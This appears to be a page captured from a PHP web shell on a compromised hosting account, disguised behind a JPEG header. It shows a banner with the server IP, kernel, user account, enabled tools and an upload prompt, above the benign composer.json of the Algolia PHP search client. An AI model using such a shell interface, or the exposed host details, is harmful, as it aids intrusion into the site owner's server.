����JFIF��x�x����'
Server IP : 78.140.185.180 / Your IP : 3.149.249.124 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/builderbox/public_html/vendor/algolia/algoliasearch-client-php/ |
Upload File : |
{ "name": "algolia/algoliasearch-client-php", "description": "Algolia Search API Client for PHP", "keywords": ["algolia", "search", "api", "client", "php"], "type": "library", "license": "MIT", "authors": [ { "name": "Algolia Team", "email": "contact@algolia.com" } ], "require": { "php": "^7.2 || ^8.0", "ext-curl": "*", "ext-json": "*", "ext-mbstring": "*", "psr/http-message": "^1.0", "psr/log": "^1.0", "psr/simple-cache": "^1.0" }, "require-dev": { "friendsofphp/php-cs-fixer": "^2.0", "fzaninotto/faker": "^1.8", "phpunit/phpunit": "^8.0 || ^9.0", "symfony/yaml": "^2.0 || ^4.0" }, "autoload": { "psr-4": { "Algolia\\AlgoliaSearch\\": "src/" }, "files": [ "src/Http/Psr7/functions.php", "src/functions.php" ] }, "autoload-dev": { "psr-4": { "Algolia\\AlgoliaSearch\\Tests\\": "tests" } }, "suggest": { "guzzlehttp/guzzle": "If you prefer to use Guzzle HTTP client instead of the Http Client implementation provided by the package" }, "bin": [ "bin/algolia-doctor" ], "minimum-stability": "dev", "prefer-stable": true, "config": { "sort-packages": true, "preferred-install": "dist" }, "extra": { "branch-alias": { "dev-2.0": "2.0.x-dev" } }, "scripts": { "lint": "php-cs-fixer fix", "test:lint": "php-cs-fixer fix -v --dry-run", "test:unit": "phpunit --colors=always", "test": [ "@test:lint", "@test:unit" ] } }